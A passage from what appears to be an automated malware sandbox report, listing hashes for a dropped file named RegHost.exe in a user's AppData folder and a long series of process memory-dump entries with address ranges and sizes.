                                                                  535a9e5a816025c2c296976561827b7c2da468bf32d168a248e1a3152cd1e65b0b07680198faa4bf1e51de6b816fc2807d37fce5526afd603ca1cd3e653ca62f

                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                                  MD5

                                                                  a3578b5feeea4db90bcb5315f769e84d

                                                                  SHA1

                                                                  436a4a014f91c138ed9019c58c5c98ada78a7f4f

                                                                  SHA256

                                                                  b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b

                                                                  SHA512

                                                                  535a9e5a816025c2c296976561827b7c2da468bf32d168a248e1a3152cd1e65b0b07680198faa4bf1e51de6b816fc2807d37fce5526afd603ca1cd3e653ca62f

                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                                  MD5

                                                                  a3578b5feeea4db90bcb5315f769e84d

                                                                  SHA1

                                                                  436a4a014f91c138ed9019c58c5c98ada78a7f4f

                                                                  SHA256

                                                                  b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b

                                                                  SHA512

                                                                  535a9e5a816025c2c296976561827b7c2da468bf32d168a248e1a3152cd1e65b0b07680198faa4bf1e51de6b816fc2807d37fce5526afd603ca1cd3e653ca62f

                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                                  MD5

                                                                  a3578b5feeea4db90bcb5315f769e84d

                                                                  SHA1

                                                                  436a4a014f91c138ed9019c58c5c98ada78a7f4f

                                                                  SHA256

                                                                  b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b

                                                                  SHA512

                                                                  535a9e5a816025c2c296976561827b7c2da468bf32d168a248e1a3152cd1e65b0b07680198faa4bf1e51de6b816fc2807d37fce5526afd603ca1cd3e653ca62f

                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                                  MD5

                                                                  a3578b5feeea4db90bcb5315f769e84d

                                                                  SHA1

                                                                  436a4a014f91c138ed9019c58c5c98ada78a7f4f

                                                                  SHA256

                                                                  b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b

                                                                  SHA512

                                                                  535a9e5a816025c2c296976561827b7c2da468bf32d168a248e1a3152cd1e65b0b07680198faa4bf1e51de6b816fc2807d37fce5526afd603ca1cd3e653ca62f

                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                                  MD5

                                                                  a3578b5feeea4db90bcb5315f769e84d

                                                                  SHA1

                                                                  436a4a014f91c138ed9019c58c5c98ada78a7f4f

                                                                  SHA256

                                                                  b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b

                                                                  SHA512

                                                                  535a9e5a816025c2c296976561827b7c2da468bf32d168a248e1a3152cd1e65b0b07680198faa4bf1e51de6b816fc2807d37fce5526afd603ca1cd3e653ca62f

                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                                  MD5

                                                                  a3578b5feeea4db90bcb5315f769e84d

                                                                  SHA1

                                                                  436a4a014f91c138ed9019c58c5c98ada78a7f4f

                                                                  SHA256

                                                                  b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b

                                                                  SHA512

                                                                  535a9e5a816025c2c296976561827b7c2da468bf32d168a248e1a3152cd1e65b0b07680198faa4bf1e51de6b816fc2807d37fce5526afd603ca1cd3e653ca62f

                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                                  MD5

                                                                  4d5606c1ae3b3ebe19a59dd1c7036171

                                                                  SHA1

                                                                  afc48e7ddd32232bb41d9714b0a33467444819b5

                                                                  SHA256

                                                                  2afb301cc037c7e193c783024106acfd7a010697c087cd881cd0cb52d9d59a38

                                                                  SHA512

                                                                  7ded563a3407bbc01a03ba1ff493c88c4c8100a94022eb9f6076204150a74d83db381c34b3d945f6cc2337088a5168675a5e03bc2a70d21637e29679a8e5bba5

                                                                • memory/224-217-0x0000000140000000-0x000000014002A000-memory.dmp
                                                                  Filesize

                                                                  168KB

                                                                • memory/528-201-0x0000000140000000-0x000000014002A000-memory.dmp
                                                                  Filesize

                                                                  168KB

                                                                • memory/544-168-0x0000000140000000-0x0000000140815000-memory.dmp
                                                                  Filesize

                                                                  8.1MB

                                                                • memory/868-216-0x0000000140000000-0x0000000140815000-memory.dmp
                                                                  Filesize

                                                                  8.1MB

                                                                • memory/1232-169-0x0000000140000000-0x000000014002A000-memory.dmp
                                                                  Filesize

                                                                  168KB

                                                                • memory/1292-157-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp
                                                                  Filesize

                                                                  12.0MB

                                                                • memory/1292-156-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp
                                                                  Filesize

                                                                  12.0MB

                                                                • memory/1292-155-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp
                                                                  Filesize

                                                                  12.0MB

                                                                • memory/1308-185-0x0000000140000000-0x000000014002A000-memory.dmp
                                                                  Filesize

                                                                  168KB

                                                                • memory/1324-177-0x0000000140000000-0x000000014002A000-memory.dmp
                                                                  Filesize

                                                                  168KB

                                                                • memory/1332-233-0x0000000140000000-0x000000014002A000-memory.dmp
                                                                  Filesize

                                                                  168KB

                                                                • memory/1412-249-0x0000000140000000-0x0000000140815000-memory.dmp
                                                                  Filesize

                                                                  8.1MB

                                                                • memory/1468-184-0x0000000140000000-0x0000000140815000-memory.dmp
                                                                  Filesize

                                                                  8.1MB

                                                                • memory/1540-205-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp
                                                                  Filesize

                                                                  12.0MB

                                                                • memory/1540-203-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp
                                                                  Filesize

                                                                  12.0MB

                                                                • memory/1540-204-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp
                                                                  Filesize

                                                                  12.0MB

                                                                • memory/1588-209-0x0000000140000000-0x000000014002A000-memory.dmp
                                                                  Filesize

                                                                  168KB

                                                                • memory/1588-265-0x0000000140000000-0x000000014002A000-memory.dmp
                                                                  Filesize

                                                                  168KB

                                                                • memory/1600-240-0x0000000140000000-0x0000000140815000-memory.dmp
                                                                  Filesize

                                                                  8.1MB

                                                                • memory/1680-219-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp
                                                                  Filesize

                                                                  12.0MB

                                                                • memory/1680-220-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp
                                                                  Filesize

                                                                  12.0MB

                                                                • memory/1680-221-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp
                                                                  Filesize

                                                                  12.0MB

                                                                • memory/1772-189-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp
                                                                  Filesize

                                                                  12.0MB

                                                                • memory/1772-187-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp
                                                                  Filesize

                                                                  12.0MB

                                                                • memory/1772-188-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp
                                                                  Filesize

                                                                  12.0MB

                                                                • memory/1888-232-0x0000000140000000-0x0000000140815000-memory.dmp
                                                                  Filesize

                                                                  8.1MB

                                                                • memory/2160-192-0x0000000140000000-0x0000000140815000-memory.dmp
                                                                  Filesize

                                                                  8.1MB

                                                                • memory/2224-145-0x0000000140000000-0x000000014002A000-memory.dmp
                                                                  Filesize

                                                                  168KB

                                                                • memory/2260-153-0x0000000140000000-0x0000000140815000-memory.dmp
                                                                  Filesize

                                                                  8.1MB

                                                                • memory/2288-257-0x0000000140000000-0x000000014002A000-memory.dmp
                                                                  Filesize

                                                                  168KB

                                                                • memory/2464-224-0x0000000140000000-0x0000000140815000-memory.dmp
                                                                  Filesize

                                                                  8.1MB

                                                                • memory/2548-152-0x0000000140000000-0x000000014002A000-memory.dmp
                                                                  Filesize

                                                                  168KB

                                                                • memory/2580-144-0x0000000140000000-0x0000000140815000-memory.dmp
                                                                  Filesize

                                                                  8.1MB

                                                                • memory/2700-241-0x0000000140000000-0x000000014002A000-memory.dmp
                                                                  Filesize

                                                                  168KB

                                                                • memory/2804-176-0x0000000140000000-0x0000000140815000-memory.dmp
                                                                  Filesize

                                                                  8.1MB

                                                                • memory/2940-200-0x0000000140000000-0x0000000140815000-memory.dmp
                                                                  Filesize

                                                                  8.1MB

                                                                • memory/3028-208-0x0000000140000000-0x0000000140815000-memory.dmp
                                                                  Filesize

                                                                  8.1MB

                                                                • memory/3036-134-0x0000000140000000-0x000000014002A000-memory.dmp
                                                                  Filesize

                                                                  168KB

                                                                • memory/3036-136-0x0000000140000000-0x000000014002A000-memory.dmp
                                                                  Filesize

                                                                  168KB

                                                                • memory/3048-193-0x0000000140000000-0x000000014002A000-memory.dmp
                                                                  Filesize

                                                                  168KB

                                                                • memory/3140-264-0x0000000140000000-0x0000000140815000-memory.dmp
                                                                  Filesize

                                                                  8.1MB

                                                                • memory/3152-164-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp
                                                                  Filesize

                                                                  12.0MB

                                                                • memory/3152-163-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp
                                                                  Filesize

                                                                  12.0MB

                                                                • memory/3152-165-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp
                                                                  Filesize

                                                                  12.0MB

                                                                • memory/3180-248-0x0000000140000000-0x000000014002A000-memory.dmp
                                                                  Filesize

                                                                  168KB

                                                                • memory/3396-161-0x0000000140000000-0x000000014002A000-memory.dmp
                                                                  Filesize

                                                                  168KB

                                                                • memory/3428-133-0x0000000140000000-0x0000000140815000-memory.dmp
                                                                  Filesize

                                                                  8.1MB

                                                                • memory/3428-135-0x0000000140000000-0x0000000140815000-memory.dmp
                                                                  Filesize

                                                                  8.1MB

                                                                • memory/3456-256-0x0000000140000000-0x0000000140815000-memory.dmp
                                                                  Filesize

                                                                  8.1MB

                                                                • memory/3492-212-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp
                                                                  Filesize

                                                                  12.0MB

                                                                • memory/3492-213-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp
                                                                  Filesize

                                                                  12.0MB

                                                                • memory/3492-211-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp
                                                                  Filesize

                                                                  12.0MB

                                                                • memory/3500-228-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp
                                                                  Filesize

                                                                  12.0MB

                                                                • memory/3500-229-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp
                                                                  Filesize

                                                                  12.0MB

                                                                • memory/3500-227-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp
                                                                  Filesize

                                                                  12.0MB

                                                                • memory/3576-173-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp
                                                                  Filesize

                                                                  12.0MB

                                                                • memory/3576-172-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp
                                                                  Filesize

                                                                  12.0MB

                                                                • memory/3576-171-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp
                                                                  Filesize

                                                                  12.0MB

                                                                • memory/3608-139-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp
                                                                  Filesize

                                                                  12.0MB

                                                                • memory/3608-141-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp
                                                                  Filesize

                                                                  12.0MB

                                                                • memory/3608-140-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp
                                                                  Filesize

                                                                  12.0MB

                                                                • memory/3632-197-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp
                                                                  Filesize

                                                                  12.0MB

                                                                • memory/3632-196-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp
                                                                  Filesize

                                                                  12.0MB

                                                                • memory/3632-195-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp
                                                                  Filesize

                                                                  12.0MB

                                                                • memory/3776-181-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp
                                                                  Filesize

                                                                  12.0MB

                                                                • memory/3776-179-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp
                                                                  Filesize

                                                                  12.0MB

                                                                • memory/3776-180-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp
                                                                  Filesize

                                                                  12.0MB

                                                                • memory/3916-160-0x0000000140000000-0x0000000140815000-memory.dmp
                                                                  Filesize

                                                                  8.1MB

                                                                • memory/3972-148-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp
                                                                  Filesize

                                                                  12.0MB

                                                                • memory/3972-147-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp
                                                                  Filesize

                                                                  12.0MB

                                                                • memory/3972-149-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp
                                                                  Filesize

                                                                  12.0MB

                                                                • memory/3992-225-0x0000000140000000-0x000000014002A000-memory.dmp
                                                                  Filesize

                                                                  168KB

                                                                • memory/4052-130-0x00007FF73FC10000-0x00007FF74080D000-memory.dmp
                                                                  Filesize

                                                                  12.0MB

                                                                • memory/4052-132-0x00007FF73FC10000-0x00007FF74080D000-memory.dmp
                                                                  Filesize

                                                                  12.0MB

                                                                • memory/4052-131-0x00007FF73FC10000-0x00007FF74080D000-memory.dmp
                                                                  Filesize

                                                                  12.0MB